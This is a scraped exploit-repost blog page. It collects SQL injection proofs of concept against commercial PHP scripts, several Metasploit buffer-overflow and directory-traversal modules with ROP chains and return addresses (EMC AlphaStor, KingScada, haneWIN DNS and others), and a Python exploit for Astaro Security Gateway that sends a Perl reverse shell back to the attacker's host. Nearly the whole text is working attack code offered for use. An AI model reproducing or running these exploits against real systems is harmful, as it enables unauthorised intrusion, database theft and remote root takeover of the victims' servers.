# # # # #
# Exploit Title: Enterprise Edition Payment Processor Script 3.7 - SQL Injection
# Dork: N/A
# Date: 14.09.2017
# Vendor Homepage: https://www.goterhosting.com/
# Software Link: https://www.goterhosting.com/payment-processor-script.php
# Demo: http://www.enterprise-edition.gvmhosting.com/
# Version: 3.7
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
#
# http://localhost/[PATH]/login
#
# User: 'or 1=1 or ''=' Pass: 'or 1=1 or ''='
#
# http://localhost/[PATH]/products?id=[SQL]&action=update
#
# -1++/*!00002UNION*/(/*!00002SELECT*/+0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,/*!00002CONCAT_WS*/(0x203a20,USER(),DATABASE(),VERSION()))--+-&action=update
#
# http://localhost/[PATH]/bank?id=[SQL]&action=update
#
# Etc..
# # # # #
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863540861
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# # # # #
# Exploit Title: Adserver Script 5.6 - SQL Injection
# Dork: N/A
# Date: 14.09.2017
# Vendor Homepage: https://www.goterhosting.com/
# Software Link: https://www.goterhosting.com/adserverscript.php
# Demo: http://adserverscript.gvmhosting.com/
# Version: 5.6
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an advertiser to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/manage-target.php?id=[SQL]&wap=0
#
# 13-13'+/*!00008union*/+/*!00008select*/++/*!00008CONCAT_WS*/(0x203a20,USER(),DATABASE(),VERSION())--+-&wap=0
#
# Etc..
# # # # #
# # # # #
# Exploit Title: PTC KSV1 Script 1.7 - SQL Injection
# Dork: N/A
# Date: 14.09.2017
# Vendor Homepage: https://www.goterhosting.com/
# Software Link: https://www.goterhosting.com/ptc-ksv1.php
# Demo: http://www.ksv1demo.gvmhosting.com/
# Version: 1.7
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/gpt.php?v=entry&type=[SQL]&id=1&
#
# +'++aND(/*!00000sELeCT*/+0x30783331+/*!00000FrOM*/+(/*!00000SeLeCT*/+cOUNT(*),/*!00000CoNCaT*/((sELEcT(sELECT+/*!00000CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a) AND ''='&id=1&
#
# Etc..
# # # # #
# # # # #
# Exploit Title: Theater Management Script - SQL Injection
# Dork: N/A
# Date: 14.09.2017
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software Link: http://www.exclusivescript.com/product/8o2b4417538/php-scripts/theater-management-script
# Demo: http://198.38.86.159/~dineshkumarwork/demo/movie/
# Version: N/A
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/show-time.php?moid=[SQL]
#
# -100'++/*!08888UNION*/(/*!08888SELECT*/0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329)--+-
#
# http://localhost/[PATH]/event-detail.php?eid=[SQL]
#
# http://localhost/[PATH]/trailer-detail.php?moid=[SQL]
#
# Etc..
# # # # #
# # # # #
# Exploit Title: Justdial Clone Script - SQL Injection
# Dork: N/A
# Date: 14.09.2017
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software Link: http://www.exclusivescript.com/product/z1mt4303451/php-scripts/justdial-clone-script
# Demo: http://74.124.215.220/~jusdil/
# Version: N/A
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/restaurants-details.php?fid=[SQL]
#
# 46'++aND(/*!00000sELeCT*/+0x30783331+/*!00000FrOM*/+(/*!00000SeLeCT*/+cOUNT(*),/*!00000CoNCaT*/((sELEcT(sELECT+/*!00000CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a) AND ''='
#
# Etc..
# # # # #
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'Mplayer SAMI Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow found in
SMPlayer 0.6.9 (Permanent DEP /AlwaysON). The overflow is
triggered during the parsing of an overly long string found
in a malicious SAMI subtitle file.
},
'License' => MSF_LICENSE,
'Author' => [ 'James Fitts' ],
'Version' => '$Revision: $',
'References' =>
[
[ 'BID', '49149' ],
[ 'OSVDB', '74604' ],
[ 'URL', 'http://www.saintcorporation.com/cgi-bin/exploit_info/mplayer_sami_subtitle_file_overflow' ],
[ 'URL', 'http://labs.mwrinfosecurity.com/assets/149/mwri_mplayer-sami-subtitles_2011-08-12.pdf' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'DisablePayloadHandler' => 'true',
},
'Payload' =>
{
'Space' => 700,
'BadChars' => "\x00\x0a\x0d\x3c\x7b",
'StackAdjustment' => -3500,
'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
'DisableNops' => 'True',
'EncoderOptions' =>
{
'BufferRegister' => 'ECX',
},
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP3 EN',
{
# pushad/ retn
# msvcrt.dll
'Ret' => 0x77c12df9,
}
],
],
'Privileged' => false,
'DisclosureDate' => 'Jun 14 2011',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msfmsfa.smi']),
], self.class)
end
def make_nops(cnt)
return "\x41" * cnt
end
def exploit
# Chain 2 => kernel32!virtualalloc
# msvcrt.dll
gadgets = [
0x77c23e7a, # XOR EAX, EAX/ RETN
0x77c13ffd, # XCHG EAX, ECX/ RETN
0x77c2c84b, # MOV EBX, ECX/ MOV ECX, EAX/ MOV EAX, ESI/ POP ESI/ RETN 10
0x41414141,
0x77c127e5, # INC EBX/ RETN
0x41414141,
0x41414141,
0x41414141,
0x41414141,
0x77c3b860, # POP EAX/ RETN
0x41414141,
0x77c2d998, # POP ECX/ RETN
0x41413141,
0x77c47918, # SUB EAX, ECX/ RETN
0x77c58fbc, # XCHG EAX, EDX/ RETN
0x77c3b860, # POP EAX/ RETN
0x41414141,
0x77c2d998, # POP ECX/ RETN
0x41414101,
0x77c47918, # SUB EAX, ECX/ RETN
0x77c13ffd, # XCHG EAX, ECX/ RETN
0x77c53f3a, # POP EBP/ RETN
0x77c53f3a, # POP EBP/ RETN
0x77c39dd3, # POP EDI/ POP ESI/ RETN
0x77c39dd5, # ROP NOP
0x77c168cd, # JMP EAX
0x77c21d16, # POP EAX/ RETN
0x7c809af1, # kernel32!virtualalloc
0x77c12df9, # PUSHAD/ RETN
0x77c35524, # PUSH ESP/ RETN
].flatten.pack("V*")
p = make_nops(16) + payload.encoded
boom = pattern_create(979)
boom << [target.ret].pack('V')
boom[83, gadgets.length] = gadgets
boom[203, p.length] = p
# Chain 1 => Stack Pivot
boom[963, 4] = [0x41414101].pack('V') # Size
boom[967, 4] = [0x77c58fbc].pack('V') # XCHG EAX, EDX/ RETN => exec 2
boom[971, 4] = [0x77c59f6b].pack('V') # ADD DH, BL/ RETN => exec 1
boom[975, 4] = [0x77c15ed5].pack('V') # XCHG EAX, ESP/ RETN => exec 3
smi = %Q|<SAMI>
<BODY>
<SYNC Start=0>
#{rand_text_alpha_upper(40)}
#{boom}
</SAMI>|
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(smi)
end
end
__END__
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'EMC AlphaStor Library Manager Opcode 0x4f',
'Description' => %q{
This module exploits a stack based buffer overflow found in EMC
Alphastor Library Manager version < 4.0 build 910. The overflow
is triggered due to a lack of sanitization of the pointers used
for two strcpy functions.
},
'Author' => [ 'james fitts' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-14-029/' ],
[ 'CVE', '2013-0946' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
'wfsdelay' => 1000
},
'Privileged' => true,
'Payload' =>
{
'Space' => 160,
'DisableNops' => 'true',
'BadChars' => "\x00\x09\x0a\x0d",
'StackAdjustment' => -404,
'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
'Compat' =>
{
'SymbolLookup' => 'ws2ord',
},
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows Server 2003 SP2 EN',
{
# msvcrt.dll
# add esp, 0c/ retn
'Ret' => 0x77bdda70,
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 13 2014'))
register_options(
[
Opt::RPORT(3500)
], self.class )
end
def exploit
connect
p = "\x90" * 8
p << payload.encoded
# msvcrt.dll
# 96 bytes
rop = [
0x77bb2563, # pop eax/ retn
0x77ba1114, # ptr to kernel32!virtualprotect
0x77bbf244, # mov eax, dword ptr [eax]/ pop ebp/ retn
0xfeedface,
0x77bb0c86, # xchg eax, esi/ retn
0x77bc9801, # pop ebp/ retn
0x77be2265,
0x77bb2563, # pop eax/ retn
0x03C0990F,
0x77bdd441, # sub eax, 3c0940fh/ retn
0x77bb48d3, # pop eax/ retn
0x77bf21e0,
0x77bbf102, # xchg eax, ebx/ add byte ptr [eax], al/ retn
0x77bbfc02, # pop ecx/ retn
0x77bef001,
0x77bd8c04, # pop edi/ retn
0x77bd8c05,
0x77bb2563, # pop eax/ retn
0x03c0984f,
0x77bdd441, # sub eax, 3c0940fh/ retn
0x77bb8285, # xchg eax, edx/ retn
0x77bb2563, # pop eax/ retn
0x90909090,
0x77be6591, # pushad/ add al, 0efh/ retn
].pack("V*")
buf = Rex::Text.pattern_create(514)
buf[0, 2] = "O~" # opcode
buf[13, 4] = [0x77bdf444].pack('V') # stack pivot 52
buf[25, 4] = [target.ret].pack('V') # stack pivot 12
buf[41, 4] = [0x77bdf444].pack('V') # stack pivot 52
buf[57, 4] = [0x01167e20].pack('V') # ptr
buf[69, rop.length] = rop
buf[165, 4] = [0x909073eb].pack('V') # jmp $+117
buf[278, 4] = [0x0116fd59].pack('V') # ptr
buf[282, p.length] = p
buf[512, 1] = "\x00"
# junk
buf << "AAAA"
buf << "BBBB"
buf << "CCCC"
buf << "DDDD"
print_status("Trying target %s..." % target.name)
sock.put(buf)
handler
disconnect
end
end
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'EMC AlphaStor Device Manager Opcode 0x72',
'Description' => %q{
This module exploits a stack based buffer overflow vulnerability
found in EMC Alphastor Device Manager. The overflow is triggered
when sending a specially crafted packet to the rrobotd.exe service
listening on port 3000. During the copying of strings to the stack
an unbounded sprintf() function overwrites the return pointer
leading to remote code execution.
},
'Author' => [ 'James Fitts' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: $',
'References' =>
[
[ 'URL', '0day' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Privileged' => true,
'Payload' =>
{
'Space' => 160,
'DisableNops' => 'true',
'BadChars' => "\x00\x09\x0a\x0d",
'StackAdjustment' => -404,
'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
'Compat' =>
{
'ConnectionType' => '+ws2ord',
}
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows Server 2003 SP2 EN',
{
# pop eax/ retn
# msvcrt.dll
'Ret' => 0x77bc5d88,
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 14 2013'))
register_options(
[
Opt::RPORT(3000)
], self.class )
end
def exploit
connect
# msvcrt.dll
# 96 bytes
rop = [
0x77bb2563, # pop eax/ retn
0x77ba1114, # ptr to kernel32!virtualprotect
0x77bbf244, # mov eax, dword ptr [eax]/ pop ebp/ retn
0xfeedface,
0x77bb0c86, # xchg eax, esi/ retn
0x77bc9801, # pop ebp/ retn
0x77be2265,
0x77bb2563, # pop eax/ retn
0x03C0990F,
0x77bdd441, # sub eax, 3c0940fh/ retn
0x77bb48d3, # pop eax/ retn
0x77bf21e0,
0x77bbf102, # xchg eax, ebx/ add byte ptr [eax], al/ retn
0x77bbfc02, # pop ecx/ retn
0x77bef001,
0x77bd8c04, # pop edi/ retn
0x77bd8c05,
0x77bb2563, # pop eax/ retn
0x03c0984f,
0x77bdd441, # sub eax, 3c0940fh/ retn
0x77bb8285, # xchg eax, edx/ retn
0x77bb2563, # pop eax/ retn
0x90909090,
0x77be6591, # pushad/ add al, 0efh/ retn
].pack("V*")
buf = "\xcc" * 550
buf[246, 4] = [target.ret].pack('V')
buf[250, 4] = [0x77bf6f80].pack('V')
buf[254, rop.length] = rop
buf[350, payload.encoded.length] = payload.encoded
packet = "\x72#{buf}"
print_status("Trying target %s..." % target.name)
sock.put(packet)
handler
disconnect
end
end
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Lockstep Backup for Workgroups <= 4.0.3',
'Description' => %q{
This module exploits a stack buffer overflow found in
Lockstep Backup for Workgroups <= 4.0.3. The vulnerability
is triggered when sending a specially crafted packet that
will cause a login failure.
},
'Author' => [ 'james fitts' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: $',
'References' =>
[
[ 'URL', 'http://secunia.com/advisories/50260/' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Privileged' => true,
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00",
'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
'EncoderOptions' =>
{
'BufferRegister' => 'ECX',
},
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows 2000 ALL EN',
{
# msvcrt.dll
# pop ecx/ pop ecx/ retn
'Ret' => 0x780146c0,
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 11 2013'))
register_options(
[
Opt::RPORT(2125),
OptString.new('USERNAME', [ true, 'Username of victim', 'msf' ])
], self.class )
end
def exploit
connect
uname = datastore['USERNAME']
p = "\x90" * 16
p << payload.encoded
packet = rand_text_alpha_upper(10000)
packet[0, 8] = "BFWCA\x01\x01\x00"
packet[8, uname.length] = "#{uname}\x00"
packet[73, p.length] = p
packet[7197, 4] = "\xeb\x06\x90\x90" # jmp $+8
packet[7201, 4] = [target.ret].pack('V')
packet[7205, 8] = "\x90" * 8
packet[7213, 2] = "\xff\xe7" # jmp edi
print_status("Trying target %s..." % target.name)
sock.put(packet)
handler
disconnect
end
end
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Disk Pulse Server \'GetServerInfo\' Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow vulnerability found
in libpal.dll of Disk Pulse Server v2.2.34. The overflow
is triggered when sending an overly long 'GetServerInfo'
request to the service listening on port 9120.
},
'Author' => [ 'James Fitts' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: $',
'References' =>
[
[ 'BID', '43919' ],
[ 'URL', 'http://www.saintcorporation.com/cgi-bin/exploit_info/disk_pulse_getserverinfo' ],
[ 'URL', 'http://www.coresecurity.com/content/disk-pulse-server-getserverinfo-request-buffer-overflow-exploit-10-5' ]
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 300,
'BadChars' => "\x00\x0a\x0d\x20",
'DisableNops' => 'True',
'StackAdjustment' => -3500,
'Compat' =>
{
'SymbolLookup' => 'ws2ord',
}
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows XP SP3 EN',
{
# p/p/r
# libspp.dll
'Ret' => 0x1006f71f,
'Offset' => 303
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Oct 19 2010'))
register_options([Opt::RPORT(9120)], self.class)
end
def exploit
connect
sploit = "GetServerInfo"
sploit << "\x41" * 8
sploit << payload.encoded
sploit << "\x42" * (303 - (8 + payload.encoded.length))
sploit << generate_seh_record(target.ret)
sploit << make_nops(4)
sploit << "\xe9\xc4\xfe\xff\xff" # jmp $-311
sploit << rand_text_alpha_upper(200)
print_status("Trying target #{target.name}...")
sock.put(sploit)
handler
disconnect
end
end
__END__
0033C05C 55 PUSH EBP
0033C05D 8B6C24 1C MOV EBP,DWORD PTR SS:[ESP+1C]
0033C061 3AC2 CMP AL,DL
0033C063 74 14 JE SHORT libpal.0033C079
0033C065 3C 0D CMP AL,0D
0033C067 74 10 JE SHORT libpal.0033C079
0033C069 3C 0A CMP AL,0A
0033C06B 74 0C JE SHORT libpal.0033C079
0033C06D 41 INC ECX
0033C06E 88042F MOV BYTE PTR DS:[EDI+EBP],AL
0033C071 47 INC EDI
0033C072 8A0431 MOV AL,BYTE PTR DS:[ECX+ESI]
0033C075 84C0 TEST AL,AL
0033C077 ^75 E8 JNZ SHORT libpal.0033C061
0033C079 C6042F 00 MOV BYTE PTR DS:[EDI+EBP],0
0033C07D 5D POP EBP
0033C07E 5F POP EDI
0033C07F 890B MOV DWORD PTR DS:[EBX],ECX
0033C081 5E POP ESI
0033C082 B8 01000000 MOV EAX,1
0033C087 5B POP EBX
0033C088 C3 RETN
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'haneWIN DNS Server Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow vulnerability found in
haneWIN DNS Server <= 1.5.3. The vulnerability is triggered
by sending an overly long packet to the victim server. A memcpy
function blindly copies user supplied data to a fixed size buffer
leading to remote code execution.
This module was tested against haneWIN DNS 1.5.3
},
'Author' => [ 'james fitts' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'EDB', '31260' ],
[ 'OSVDB', '102773' ]
],
'Privileged' => false,
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1000,
'DisableNops' => true,
'BadChars' => "\x00\x0a\x0d\x20",
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
},
'Platform' => 'win',
'DefaultTarget' => 0,
'Targets' =>
[
[
'Windows 2000 SP4 EN / haneWIN DNS 1.5.3',
{
# msvcrt.dll v6.10.9844.0
# pop esi/ pop edi/ retn
'Ret' => 0x78010394,
}
]
],
'DisclosureDate' => 'Jul 27 2013'))
register_options([Opt::RPORT(53)], self.class)
end
def exploit
connect
p = make_nops(32) + payload.encoded
buf = Rex::Text.pattern_create(5000)
buf[0, 2] = [0x4e20].pack('n') # length for malloc
buf[1332, p.length] = p
buf[2324, 8] = generate_seh_record(target.ret)
buf[2332, 15] = make_nops(10) + "\xe9\x13\xfc\xff\xff" # jmp $-1000
print_status("Sending malicious request...")
sock.put(buf)
disconnect
end
end
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'KingScada AlarmServer Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow found in
KingScada < 3.1.2.13. The vulnerability is triggered when
sending a specially crafted packet to the 'AlarmServer'
(AEserver.exe) service listening on port 12401. During the
parsing of the packet the 3rd dword is used as a size value
for a memcpy operation which leads to an overflown stack buffer
},
'Author' => [ 'James Fitts' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2014-0787' ],
[ 'ZDI', '14-071' ],
[ 'URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-14-098-02' ]
],
'Privileged' => false,
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00\x0a\x0d\x20",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows XP SP3 EN / WellinTech KingScada 31.1.1.4',
{
# dbghelp.dll
# pop esi/ pop edi/ retn
'ret' => 0x02881fbf,
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Apr 10, 2014'))
register_options([Opt::RPORT(12401)], self.class)
end
def exploit
connect
p = payload.encoded
buf = make_nops(5000)
buf[0, 4] = [0x000004d2].pack('V')
buf[4, 4] = [0x0000007b].pack('V')
buf[8, 4] = [0x0000133c].pack('V') # size for memcpy()
buf[1128, p.length] = p
buf[2128, 8] = generate_seh_record(target['ret'])
buf[2136, 5] = "\xe9\x4b\xfb\xff\xff" # jmp $-1200
print_status("Trying target #{target.name}...")
sock.put(buf)
handler
disconnect
end
end
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Rex::Proto::TFTP
include Msf::Exploit::EXE
include Msf::Exploit::WbemExec
def initialize(info={})
super(update_info(info,
'Name' => "Cloudview NMS 2.00b Writable Directory Traversal Execution",
'Description' => %q{
This module exploits a vulnerability found in Cloudview NMS server. The
software contains a directory traversal vulnerability that allows a remote
attacker to write arbitrary file to the file system, which results in
code execution under the context 'SYSTEM'.
},
'License' => MSF_LICENSE,
'Author' => [ 'james fitts' ],
'References' =>
[
['URL', '0day']
],
'Payload' =>
{
'BadChars' => "\x00",
},
'DefaultOptions' =>
{
'ExitFunction' => "none"
},
'Platform' => 'win',
'Targets' =>
[
[ ' Cloudview NMS 2.00b on Windows', {} ]
],
'Privileged' => false,
'DisclosureDate' => "Oct 13 2014",
'DefaultTarget' => 0))
register_options([
OptInt.new('DEPTH', [ false, "Levels to reach base directory", 5 ]),
OptAddress.new('RHOST', [ true, "The remote TFTP server address" ]),
OptPort.new('RPORT', [ true, "The remote TFTP server port", 69 ])
], self.class)
end
def upload(filename, data)
tftp_client = Rex::Proto::TFTP::Client.new(
"LocalHost" => "0.0.0.0",
"LocalPort" => 1025 + rand(0xffff-1025),
"PeerHost" => datastore['RHOST'],
"PeerPort" => datastore['RPORT'],
"LocalFile" => "DATA:#{data}",
"RemoteFile" => filename,
"Mode" => "octet",
"Context" => {'Msf' => self.framework, "MsfExploit" => self },
"Action" => :upload
)
ret = tftp_client.send_write_request { |msg| print_status(msg) }
while not tftp_client.complete
select(nil, nil, nil, 1)
tftp_client.stop
end
end
def exploit
peer = "#{datastore['RHOST']}:#{datastore['RPORT']}"
exe_name = rand_text_alpha(rand(10)+5) + '.exe'
exe = generate_payload_exe
mof_name = rand_text_alpha(rand(10)+5) + '.mof'
mof = generate_mof(mof_name, exe_name)
depth = (datastore['DEPTH'].nil? or datastore['DEPTH'] == 0) ? 10 : datastore['DEPTH']
levels = "../" * depth
print_status("#{peer} - Uploading executable (#{exe.length.to_s} bytes)")
upload("#{levels}WINDOWS\\system32\\#{exe_name}", exe)
select(nil, nil, nil, 1)
print_status("#{peer} - Uploading .mof...")
upload("#{levels}WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof)
end
end
#!/usr/bin/python
# Astaro Security Gateway v7 - Unauthenticated Remote Code Execution
# Exploit Authors: Jakub Palaczynski and Maciej Grabiec
# Tested on versions: 7.500 and 7.506
# Date: 13.12.2016
# Vendor Homepage: https://www.sophos.com/
# CVE: CVE-2017-6315
import socket
import sys
import os
import threading
import subprocess
import time
# print help or assign arguments
if len(sys.argv) != 3:
sys.stderr.write("[-]Usage: python %s <our_ip> <remote_ip:port>\n" % sys.argv[0])
sys.stderr.write("[-]Exemple: python %s 192.168.1.1 192.168.1.2:4444\n" % sys.argv[0])
sys.exit(1)
lhost = sys.argv[1] # our ip address
rhost = sys.argv[2] # ip address and port of vulnerable ASG v7
# for additional thread to send requests in parallel
class requests (threading.Thread):
def run(self):
print 'Sending requests to trigger vulnerability.'
time.sleep(5)
# first request to clear cache
os.system('curl -s -m 5 -X POST https://' + rhost + '/index.plx -d \'{"objs": [{"FID": "init"}],"backend_address": "' + lhost + ':81"}\' -k > /dev/null')
# second request to trigger reverse connection
os.system('curl -s -m 20 -X POST https://' + rhost + '/index.plx -d \'{"objs": [{"FID": "init"}],"backend_address": "' + lhost + ':80"}\' -k > /dev/null')
# function that creates socket
def create_socket(port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('0.0.0.0', port))
sock.listen(10)
conn, addr = sock.accept()
return sock, conn, addr
# function to receive data from socket
def receive(conn):
sys.stdout.write(conn.recv(1024))
sys.stdout.flush()
sys.stdout.write(conn.recv(1024))
sys.stdout.flush()
# Thanks to Agarri: http://www.agarri.fr/docs/PoC_thaw_perl58.pl
# This script creates serialized object that makes reverse connection and executes everything what it receives on a socket
file = """
#!/usr/bin/perl
use strict;
use MIME::Base64 qw( encode_base64 );
use Storable qw( nfreeze );
use LWP::UserAgent;
my $package_name = "A" x 252;
my $pack = qq~{ package $package_name; sub STORABLE_freeze { return 1; } }~;
eval($pack);
my $payload = qq~POSIX;eval('sleep(10);use IO::Socket::INET;\$r=IO::Socket::INET->new(\"""" + lhost + """:443");if (\$r) {eval(<\$r>);}');exit;~;
my $padding = length($package_name) - length($payload);
$payload = $payload . (";" x $padding);
my $data = bless { ignore => 'this' }, $package_name;
my $frozen = nfreeze($data);
$frozen =~ s/$package_name/$payload/g;
my $encodedSize = length($frozen);
my $pakiet = print(pack("N", $encodedSize), $frozen);
print "$frozen";
"""
# save file, run perl script and save our serialized payload
f = open("payload.pl", "w")
f.write(file)
f.close()
serialized = os.popen("perl ./payload.pl").read()
os.remove("./payload.pl")
# start thread that sends requests
thread = requests()
thread.start()
# open socket that receives connection from index
sock, conn, addr = create_socket(80)
print 'Received connection from: ' + addr[0] + ':' + str(addr[1]) + '.'
print 'Sending 1st stage payload.'
data = conn.recv(256)
# say hello to RPC client
conn.sendall(data)
data = conn.recv(256)
# send serialized object that initiates connect back connection and executes everything what it receives on a socket
conn.sendall(serialized)
sock.close()
# create second socket that receives connection from index and sends additional commands
sock, conn, addr = create_socket(443)
print 'Sending 2nd stage payload.'
# send commands that exploit confd (running with root permissions) which is running on localhost - the same exploitation as for first stage
conn.sendall('sleep(10);use IO::Socket::INET;my $s = new IO::Socket::INET(PeerHost => "127.0.0.1",PeerPort => "4472",Proto => "tcp");$s->send("\\x00\\x00\\x00\\x1d\\x05\\x06\\x02\\x00\\x00\\x00\\x04\\x0a\\x04\\x70\\x72\\x70\\x63\\x0a\\x04\\x30\\x2e\\x30\\x31\\x0a\\x06\\x73\\x79\\x73\\x74\\x65\\x6d\\x0a\\x00");my $a;$s->recv($a,1024);$s->send("' + "\\x" + "\\x".join("{:02x}".format(ord(c)) for c in serialized) + '");$s->recv($a,1024);$s->close();\n')
sock.close()
# create socket that receives connection from confd and sends commands to get reverse shell
sock, conn, addr = create_socket(443)
print 'Sending 3rd stage payload.'
# send reverse shell payload
conn.sendall('sleep(20);use Socket;$i="' + lhost + '";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\n')
sock.close()
# create socket to receive shell with root permissions
print '\nNow you need to wait for shell.'
sock, conn, addr = create_socket(443)
receive(conn)
while True:
cmd = raw_input("")
